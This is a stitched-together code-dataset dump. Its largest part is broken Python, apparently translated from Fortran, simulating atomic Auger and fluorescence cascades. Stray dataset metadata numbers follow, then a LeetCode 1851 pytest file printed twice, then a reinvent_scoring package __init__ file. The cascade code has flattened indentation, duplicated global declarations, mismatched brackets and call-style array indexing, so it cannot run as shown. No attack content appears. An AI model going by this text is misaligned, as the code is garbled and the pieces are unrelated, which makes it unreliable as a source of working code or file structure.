R3=random.uniform(0.0,1.0)
THET=numpy.arccos(1.0-2.0*R3)
R4=random.uniform(0.0,1.0)
PHI=TWOPI*R4
DRX[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.cos(PHI)
DRY[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.sin(PHI)
DRZ[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.cos(THET)
NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]+1
NOCC[int(KGAS)][int(LGAS)][I]=NOCC[int(KGAS)][int(LGAS)][I]-1
# FIND LOWEST VACANCY
VACANCY(KGAS,LGAS,ISHELL,ILAST)
if(ILAST == 1):
# NO MORE TRANSITIONS POSSIBLE
return
# endif
GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# endif
GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
counter116=1
while(counter116):
counter116=0
R2=R1-TEMP[17]
for J in range(1,17+1):
if(counter116):
break
for I in range(1,17+1):
if(R2 < TEMP1[I+((J-1)*17)]) :
# AUGER OR COSTER KRONIG
# STORE EJECTED ELECTRON AND UPDATE NOCC
ETEMP=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]-(ELEV[I][IZ[int(KGAS)][int(LGAS)]]+ELEV[I][IZ[int(KGAS)][int(LGAS)]+1])*0.5-(ELEV[J][IZ[int(KGAS)][int(LGAS)]]+ELEV[J][IZ[int(KGAS)][int(LGAS)]+1])*0.5
if(ETEMP < 0.0):
# DO NOT ALLOW NEGATIVE ENERGY TRANSITIONS
counter117=1
while(counter117):
counter117=0
R1=random.uniform(0.0,1.0)
if(R1 < TEMP[17]):
counter117=1
counter116=1
break
# endif
IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
if(IONSUM[int(NVAC)]> 28) :
print(' 3RD GEN ION CHARGE LIMITED TO 28 IONSUM=', IONSUM[int(NVAC)])
sys.exit()
# endif
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ETEMP
ELEFT=ELEFT-ETEMP
if(ELEFT < 0.0):
GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# RANDOM EMISSION DIRECTION
R3=random.uniform(0.0,1.0)
THET=numpy.arccos(1.0-2.0*R3)
R4=random.uniform(0.0,1.0)
PHI=TWOPI*R4
DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]+1
NOCC[int(KGAS)][int(LGAS)][I]=NOCC[int(KGAS)][int(LGAS)][I]-1
NOCC[int(KGAS)][int(LGAS)][J]=NOCC[int(KGAS)][int(LGAS)][J]-1
# FIND LOWEST VACANCY
VACANCY(KGAS,LGAS,ISHELL,ILAST)
if(ILAST == 1):
# NO MORE TRANSITIONS POSSIBLE
return
# endif
GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# endif
GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
print(' ERROR IN CASCADE 3')
sys.exit()
# end
def CALC4(NVAC,KGAS,LGAS,ELECEN,ISHELL,L1):
# IMPLICIT #real*8(A-H,O-Z)
# IMPLICIT #integer*8(I-N)
# SCR=""\nSCR1=""
# COMMON/GENCAS/ELEV[17,79],NSDEG(17),AA[17],BB[17],SCR,SCR1
# COMMON/MIXC/PRSH(6,3,17,17),ESH(6,3,17),AUG(6,3,17,17,17),RAD[6,3,17,17],PRSHBT(6,3,17),IZ[6,3],INIOCC(6,3,17),ISHLMX(6,3),AMZ[6,3]
# COMMON/UPD/NOCC(6,3,17),AUGR(6,3,17,17,17),RADR(6,3,17,17)
# COMMON/CALCAS3/IONSUM0(10),IFLSUM0(10),ESTORE0(10,28),EPHOTON0(10,28),DRXE0(10,28),DRYE0(10,28),DRZE0(10,28),DRX0(10,28),DRY0(10,28),DRZ0(10,28)
# COMMON/CALCAS4/IONSUM(10),IFLSUM(10),ESTORE(10,28),EPHOTON(10,28),DRXE(10,28),DRYE(10,28),DRZE(10,28),DRX(10,28),DRY(10,28),DRZ[10,28]
# DIMENSION TEMP[17],TEMP1(289)
#COMMON/GENCAS/
global ELEV#[17,79]
global NSDEG#[17]
global AA#[17]
global BB#[17]
global SCR,SCR1
#COMMON/MIXC/
global PRSH#(6,3,17,17)
global ESH#(6,3,17)
global AUG#(6,3,17,17,17)
global RAD#[6,3,17,17]
global PRSHBT#(6,3,17)
global IZ#[6,3]
global INIOCC#(6,3,17)
global ISHLMX#(6,3)
global AMZ#[6,3]
#COMMON/UPD/
global NOCC#(6,3,17)
global AUGR#(6,3,17,17,17)
global RADR#(6,3,17,17)
#COMMON/CALCAS3/
global IONSUM#(10)
global IFLSUM#(10)
global ESTORE#(10,28)
global EPHOTON#(10,28)
global DRXE#(10,28)
global DRYE#(10,28)
global DRZE#(10,28)
global DRX#(10,28)
global DRY#(10,28)
global DRZ#[10,28]
# COMMON/CALCAS4/
global IONSUM#(10]
global IFLSUM#(10]
global ESTORE#(10,28]
global EPHOTON#(10,28]
global DRXE#(10,28]
global DRYE#(10,28]
global DRZE#(10,28]
global DRX#(10,28]
global DRY#(10,28]
global DRZ#[10,28]
#DIMENSION
TEMP=[0 for x in range(17)]
TEMP1=[0 for x in range(289)]
#
# CALCULATE CASCADE IN GAS KGAS AND MOLECULAR COMPONENT LGAS
# WITH INTIAL ENERGY DEPOSIT ELECEN AND SHELL VACANCY CREATED AT ISHELL
#
ISTART=IONSUM[int(NVAC)]
ISTARTF=IFLSUM[int(NVAC)]
API=numpy.arccos(-1.00)
TWOPI=2.00*API
def GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
ELEFT=ELECEN
INIT=1
# SET STARTING ARRAY NOCC EQUAL TO INIOCC
for I in range(1,17+1):
NOCC[int(KGAS)][int(LGAS)][I]=INIOCC[int(KGAS)][int(LGAS)][I]
IONSUM[int(NVAC)]=ISTART+1
IFLSUM[int(NVAC)]=ISTARTF
# STORE PHOTOELECTRON ENERGY AND ANGLE
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ELECEN-ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]
ELECN=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]
ELEFT=ELEFT-ELECN
NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]-1
# USE PHOTOELECTRON ANGULAR DISTRIBUTION
APE=AA[ISHELL]
BPE=BB[ISHELL]
ANGGEN(APE,BPE,THET)
if(THET < 0.0):
THET=THET+API
R3=random.uniform(0.0,1.0)
PHI=TWOPI*R3
DRCOS(DRX0(NVAC,L1),DRY0(NVAC,L1),DRZ0(NVAC,L1),THET,PHI,DRXX,DRYY,DRZZ)
DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRXX
DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRYY
DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRZZ
# LOOP AROUND CASCADE
def GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
# CHECK FOR ELECTRON SHAKEOFF
IDUM=1
if(INIT > 1):
ELECN=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]
INSUM=IONSUM[int(NVAC)]
SHAKE(ISHELL,ELECN,KGAS,LGAS,ESHK,IDUM,INSUM,JVAC)
# CALCULATE ENERGY OF ELECTRON
if(JVAC == 0):
GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# ELECTRON + SHAKEOFF
ELECN=ELECN-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ELECN
IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
# MAXIMUM ION CHARGE STATE =28
if(IONSUM[int(NVAC)]> 28) :
print(' 4TH GEN ION CHARGE LIMITED TO 28 IONSUM=',IONSUM[int(NVAC)])
sys.exit()
# endif
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ESHK
ELEFT=ELEFT-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
if(ELEFT < 0.0):
GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# RANDOM EMISSION ANGLE
R3=random.uniform(0.0,1.0)
THET=numpy.arccos(1.0-2.0*R3)
R4=random.uniform(0.0,1.0)
PHI=TWOPI*R4
DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
def GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
UPDATE(KGAS,LGAS,ISHELL)
INIT=2
# CHOOSE FLUORESCENCE OR AUGER TRANSITION
TSUM=0.0
for I in range(1,17+1):
TSUM=TSUM+RADR[int(KGAS)][int(LGAS)][ISHELL][I]
for J in range(1,17+1):
TSUM=TSUM+AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]
# NO MORE TRANSITIONS POSSIBLE
if(TSUM == 0.0):
return
# NORMALISE TO 1.0
for I in range(1,17+1):
RADR[int(KGAS)][int(LGAS)][ISHELL][I]=RADR[int(KGAS)][int(LGAS)][ISHELL][I]/TSUM
for J in range(1,17+1):
AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]/TSUM
# CREATE CUMULATIVE SUM ARRAY
TEMP[1]=RADR[int(KGAS)][int(LGAS)][ISHELL][1]
for I in range(2,17+1):
TEMP[I]=RADR[int(KGAS)][int(LGAS)][ISHELL][I]+TEMP[I-1]
TEMP1[1]=AUGR[int(KGAS)][int(LGAS)][ISHELL][1][1]
for I in range(2,17+1):
TEMP1[I]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][1]+TEMP1[I-1]
for J in range(1,16+1):
for I in range(1,17+1):
TEMP1[I+(J*17)]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][(J+1)]+TEMP1[I+(J*17)-1]
# FIND FLUORESCENCE OR AUGER TRANSITION
R1=random.uniform(0.0,1.0)
for I in range(1,17+1):
if(R1 < TEMP[I]) :
# STORE PHOTON ENERGY AND UPDATE NOCC
IFLSUM[int(NVAC)]=IFLSUM[int(NVAC)]+1
EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]-ELEV[I][IZ[int(KGAS)][int(LGAS)]]
ELEFT=ELEFT-EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]
if(ELEFT < 0.0):
GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# RANDOM EMISSION DIRECTION
R3=random.uniform(0.0,1.0)
THET=numpy.arccos(1.0-2.0*R3)
R4=random.uniform(0.0,1.0)
PHI=TWOPI*R4
DRX[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.cos(PHI)
DRY[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.sin(PHI)
DRZ[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.cos(THET)
NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]+1
NOCC[int(KGAS)][int(LGAS)][I]=NOCC[int(KGAS)][int(LGAS)][I]-1
# FIND LOWEST VACANCY
VACANCY(KGAS,LGAS,ISHELL,ILAST)
if(ILAST == 1):
# NO MORE TRANSITIONS POSSIBLE
return
# endif
GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# endif
GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
counter116=1
while(counter116):
R2=R1-TEMP[17]
for J in range(1,17+1):
if(counter116):
break
for I in range(1,17+1):
if(R2 < TEMP1(I+((J-1)*17))) :
# AUGER OR COSTER KRONIG
# STORE EJECTED ELECTRON AND UPDATE NOCC
ETEMP=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]-(ELEV[I][IZ[int(KGAS)][int(LGAS)]]+ELEV[I][IZ[int(KGAS)][int(LGAS)]+1])*0.5-(ELEV[J][IZ[int(KGAS)][int(LGAS)]]+ELEV[J][IZ[int(KGAS)][int(LGAS)]+1])*0.5
if(ETEMP < 0.0):
# DO NOT ALLOW NEGATIVE ENERGY TRANSITIONS
counter117=1
while(counter117):
counter117=0
R1=random.uniform(0.0,1.0)
if(R1 < TEMP[17]):
counter117=1
counter116=1
break
# endif
IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
if(IONSUM[int(NVAC)]> 28) :
print(' 4TH GEN ION CHARGE LIMITED TO 28 IONSUM=',IONSUM[int(NVAC)])
sys.exit()
# endif
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ETEMP
ELEFT=ELEFT-ETEMP
if(ELEFT < 0.0):
GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# RANDOM EMISSION DIRECTION
R3=random.uniform(0.0,1.0)
THET=numpy.arccos(1.0-2.0*R3)
R4=random.uniform(0.0,1.0)
PHI=TWOPI*R4
DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]+1
NOCC[int(KGAS)][int(LGAS)][I]=NOCC[int(KGAS)][int(LGAS)][I]-1
NOCC[int(KGAS)][int(LGAS)][J]=NOCC[int(KGAS)][int(LGAS)][J]-1
# FIND LOWEST VACANCY
VACANCY(KGAS,LGAS,ISHELL,ILAST)
if(ILAST == 1):
# NO MORE TRANSITIONS POSSIBLE
return
# endif
GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# endif
GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
print(' ERROR IN CASCADE 4')
sys.exit()
# end
def CALC5(NVAC,KGAS,LGAS,ELECEN,ISHELL,L1):
# IMPLICIT #real*8(A-H,O-Z)
# IMPLICIT #integer*8(I-N)
# SCR=""\nSCR1=""
#COMMON/GENCAS/
global ELEV#[17,79]
global NSDEG#[17]
global AA#[17]
global BB#[17]
global SCR,SCR1
#COMMON/MIXC/
global PRSH#(6,3,17,17)
global ESH#(6,3,17)
global AUG#(6,3,17,17,17)
global RAD#[6,3,17,17]
global PRSHBT#(6,3,17)
global IZ#[6,3]
global INIOCC#(6,3,17)
global ISHLMX#(6,3)
global AMZ#[6,3]
#COMMON/UPD/
global NOCC#(6,3,17)
global AUGR#(6,3,17,17,17)
global RADR#(6,3,17,17)
#COMMON/CALCAS4/
global IONSUM0#(10)
global IFLSUM0#(10)
global ESTORE0#(10,28)
global EPHOTON0#(10,28)
global DRXE0#(10,28)
global DRYE0#(10,28)
global DRZE0#(10,28)
global DRX0#(10,28)
global DRY0#(10,28)
global DRZ0#(10,28)
#COMMON/CALCAS5/
global IONSUM#(10)
global IFLSUM#(10)
global ESTORE#(10,28)
global EPHOTON#(10,28)
global DRXE#(10,28)
global DRYE#(10,28)
global DRZE#(10,28)
global DRX#(10,28)
global DRY#(10,28)
global DRZ#[10,28]
#DIMENSION
TEMP=[0 for x in range(17)]
TEMP1=[0 for x in range(289)]
#
# CALCULATE CASCADE IN GAS KGAS AND MOLECULAR COMPONENT LGAS
# WITH INTIAL ENERGY DEPOSIT ELECEN AND SHELL VACANCY CREATED AT ISHELL
#
ISTART=IONSUM[int(NVAC)]
ISTARTF=IFLSUM[int(NVAC)]
API=numpy.arccos(-1.00)
TWOPI=2.00*API
def GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
ELEFT=ELECEN
INIT=1
# SET STARTING ARRAY NOCC EQUAL TO INIOCC
for I in range(1,17+1):
NOCC[int(KGAS)][int(LGAS)][I]=INIOCC[int(KGAS)][int(LGAS)][I]
IONSUM[int(NVAC)]=ISTART+1
IFLSUM[int(NVAC)]=ISTARTF
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ELECEN-ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]
ELECN=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]
ELEFT=ELEFT-ELECN
NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]-1
# USE PHOTOELECTRON ANGULAR DISTRIBUTION
APE=AA[ISHELL]
BPE=BB[ISHELL]
ANGGEN(APE,BPE,THET)
if(THET < 0.0):
THET=THET+API
R3=random.uniform(0.0,1.0)
PHI=TWOPI*R3
DRCOS(DRX0[int(NVAC)][L1],DRY0[int(NVAC)][L1],DRZ0[int(NVAC)][L1],THET,PHI,DRXX,DRYY,DRZZ)
DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRXX
DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRYY
DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRZZ
# LOOP AROUND CASCADE
def GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
# CHECK FOR ELECTRON SHAKEOFF
IDUM=1
if(INIT > 1):
ELECN=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]
INSUM=IONSUM[int(NVAC)]
SHAKE(ISHELL,ELECN,KGAS,LGAS,ESHK,IDUM,INSUM,JVAC)
# CALCULATE ENERGY OF ELECTRON
if(JVAC == 0):
GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# ELECTRON + SHAKEOFF
ELECN=ELECN-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ELECN
IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
# MAXIMUM ION CHARGE STATE =28
if(IONSUM[int(NVAC)]> 28) :
print(' 5TH GEN ION CHARGE LIMITED TO 28 IONSUM=',IONSUM[int(NVAC)])
sys.exit()
# endif
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ESHK
ELEFT=ELEFT-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
if(ELEFT < 0.0):
GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# RANDOM EMISSION ANGLE
R3=random.uniform(0.0,1.0)
THET=numpy.arccos(1.0-2.0*R3)
R4=random.uniform(0.0,1.0)
PHI=TWOPI*R4
DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
def GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
UPDATE(KGAS,LGAS,ISHELL)
INIT=2
# CHOOSE FLUORESCENCE OR AUGER TRANSITION
TSUM=0.0
for I in range(1,17+1):
TSUM=TSUM+RADR[int(KGAS)][int(LGAS)][ISHELL][I]
for J in range(1,17+1):
TSUM=TSUM+AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]
# NO MORE TRANSITIONS POSSIBLE
if(TSUM == 0.0):
return
# NORMALISE TO 1.0
for I in range(1,17+1):
RADR[int(KGAS)][int(LGAS)][ISHELL][I]=RADR[int(KGAS)][int(LGAS)][ISHELL][I]/TSUM
for J in range(1,17+1):
AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]/TSUM
# CREATE CUMULATIVE SUM ARRAY
TEMP[1]=RADR[int(KGAS)][int(LGAS)][ISHELL][1]
for I in range(2,17+1):
TEMP[I]=RADR[int(KGAS)][int(LGAS)][ISHELL][I]+TEMP[I-1]
TEMP1[1]=AUGR[int(KGAS)][int(LGAS)][ISHELL][1][1]
for I in range(2,17+1):
TEMP1[I]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][1]+TEMP1[I-1]
for J in range(1,16+1):
for I in range(1,17+1):
TEMP1[I+(J*17)]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][(J+1)]+TEMP1[I+(J*17)-1]
# FIND FLUORESCENCE OR AUGER TRANSITION
R1=random.uniform(0.0,1.0)
for I in range(1,17+1):
if(R1 < TEMP[I]) :
# STORE PHOTON ENERGY AND UPDATE NOCC
IFLSUM[int(NVAC)]=IFLSUM[int(NVAC)]+1
EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]-ELEV[I][IZ[int(KGAS)][int(LGAS)]]
ELEFT=ELEFT-EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]
if(ELEFT < 0.0):
GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# RANDOM EMISSION DIRECTION
R3=random.uniform(0.0,1.0)
THET=numpy.arccos(1.0-2.0*R3)
R4=random.uniform(0.0,1.0)
PHI=TWOPI*R4
DRX[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.cos(PHI)
DRY[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.sin(PHI)
DRZ[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.cos(THET)
NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]+1
NOCC[int(KGAS)][int(LGAS)][I]=NOCC[int(KGAS)][int(LGAS)][I]-1
# FIND LOWEST VACANCY
VACANCY(KGAS,LGAS,ISHELL,ILAST)
if(ILAST == 1):
# NO MORE TRANSITIONS POSSIBLE
return
# endif
GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# endif
GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
counter116=1
while(counter116):
counter116=0
R2=R1-TEMP[17]
for J in range(1,17+1):
if(counter116):
break
for I in range(1,17+1):
if(R2 < TEMP1[I+((J-1)*17)]) :
# AUGER OR COSTER KRONIG
# STORE EJECTED ELECTRON AND UPDATE NOCC
ETEMP=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]-(ELEV[I][IZ[int(KGAS)][int(LGAS)]]+ELEV[I][IZ[int(KGAS)][int(LGAS)]+1])*0.5-(ELEV[J][IZ[int(KGAS)][int(LGAS)]]+ELEV[J][IZ[int(KGAS)][int(LGAS)]+1])*0.5
if(ETEMP < 0.0):
# DO NOT ALLOW NEGATIVE ENERGY TRANSITIONS
counter117=1
while(counter117):
counter117=0
R1=random.uniform(0.0,1.0)
if(R1 < TEMP[17]):
counter117=1
counter116=1
break
# endif
IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
if(IONSUM[int(NVAC)]> 28) :
print(' 5TH GEN ION CHARGE LIMITED TO 28 IONSUM=',IONSUM[int(NVAC)])
sys.exit()
# endif
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ETEMP
ELEFT=ELEFT-ETEMP
if(ELEFT < 0.0):
GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# RANDOM EMISSION DIRECTION
R3=random.uniform(0.0,1.0)
THET=numpy.arccos(1.0-2.0*R3)
R4=random.uniform(0.0,1.0)
PHI=TWOPI*R4
DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]+1
NOCC[int(KGAS)][int(LGAS)][I]=NOCC[int(KGAS)][int(LGAS)][I]-1
NOCC[int(KGAS)][int(LGAS)][J]=NOCC[int(KGAS)][int(LGAS)][J]-1
# FIND LOWEST VACANCY
VACANCY(KGAS,LGAS,ISHELL,ILAST)
if(ILAST == 1):
# NO MORE TRANSITIONS POSSIBLE
return
# endif
GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# endif
GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
print(' ERROR IN CASCADE 5')
sys.exit()
# end
| 44.671789
| 230
| 0.47919
| 9,218
| 72,681
| 3.777609
| 0.032111
| 0.07659
| 0.065074
| 0.082419
| 0.912728
| 0.899862
| 0.890845
| 0.884441
| 0.867928
| 0.858308
| 0
| 0.060797
| 0.372449
| 72,681
| 1,626
| 231
| 44.699262
| 0.702659
| 0.121435
| 0
| 0.866512
| 0
| 0
| 0.015235
| 0.000884
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020833
| false
| 0.002315
| 0.003086
| 0
| 0.048611
| 0.022377
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82a3aea34ee00628b840ea5e29c026faf7a105fd
| 1,594
|
py
|
Python
|
tests/test_1851.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
tests/test_1851.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
tests/test_1851.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import pytest
"""
Test 1851. Minimum Interval to Include Each Query
"""
@pytest.fixture(scope="session")
def init_variables_1851():
from src.leetcode_1851_minimum_interval_to_include_each_query import Solution
solution = Solution()
def _init_variables_1851():
return solution
yield _init_variables_1851
class TestClass1851:
def test_solution_0(self, init_variables_1851):
assert init_variables_1851().minInterval([[1, 4], [2, 4], [3, 6], [4, 4]], [2, 3, 4, 5]) == [
3,
3,
1,
4,
]
def test_solution_1(self, init_variables_1851):
assert init_variables_1851().minInterval(
[[2, 3], [2, 5], [1, 8], [20, 25]], [2, 19, 5, 22]
) == [2, -1, 4, 6]
#!/usr/bin/env python
import pytest
"""
Test 1851. Minimum Interval to Include Each Query
"""
@pytest.fixture(scope="session")
def init_variables_1851():
from src.leetcode_1851_minimum_interval_to_include_each_query import Solution
solution = Solution()
def _init_variables_1851():
return solution
yield _init_variables_1851
class TestClass1851:
def test_solution_0(self, init_variables_1851):
assert init_variables_1851().minInterval([[1, 4], [2, 4], [3, 6], [4, 4]], [2, 3, 4, 5]) == [
3,
3,
1,
4,
]
def test_solution_1(self, init_variables_1851):
assert init_variables_1851().minInterval(
[[2, 3], [2, 5], [1, 8], [20, 25]], [2, 19, 5, 22]
) == [2, -1, 4, 6]
| 22.450704
| 101
| 0.59473
| 212
| 1,594
| 4.216981
| 0.20283
| 0.203579
| 0.266219
| 0.09396
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.133562
| 0.267252
| 1,594
| 70
| 102
| 22.771429
| 0.631849
| 0.025094
| 0
| 0.95
| 0
| 0
| 0.009736
| 0
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.2
| false
| 0
| 0.1
| 0.05
| 0.4
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
82c328bd97463563ef022a0a1cfd7a21a31c0060
| 586
|
py
|
Python
|
reinvent_scoring/scoring/__init__.py
|
MolecularAI/reinvent-scoring
|
f7e052ceeffd29e17e1672c33607189873c82a45
|
[
"MIT"
] | null | null | null |
reinvent_scoring/scoring/__init__.py
|
MolecularAI/reinvent-scoring
|
f7e052ceeffd29e17e1672c33607189873c82a45
|
[
"MIT"
] | 2
|
2021-11-01T23:19:42.000Z
|
2021-11-22T23:41:39.000Z
|
reinvent_scoring/scoring/__init__.py
|
MolecularAI/reinvent-scoring
|
f7e052ceeffd29e17e1672c33607189873c82a45
|
[
"MIT"
] | 2
|
2021-11-18T13:14:22.000Z
|
2022-03-16T07:52:57.000Z
|
from reinvent_scoring.scoring.function import *
from reinvent_scoring.scoring.enums import *
from reinvent_scoring.scoring.score_components import *
from reinvent_scoring.scoring.component_parameters import ComponentParameters
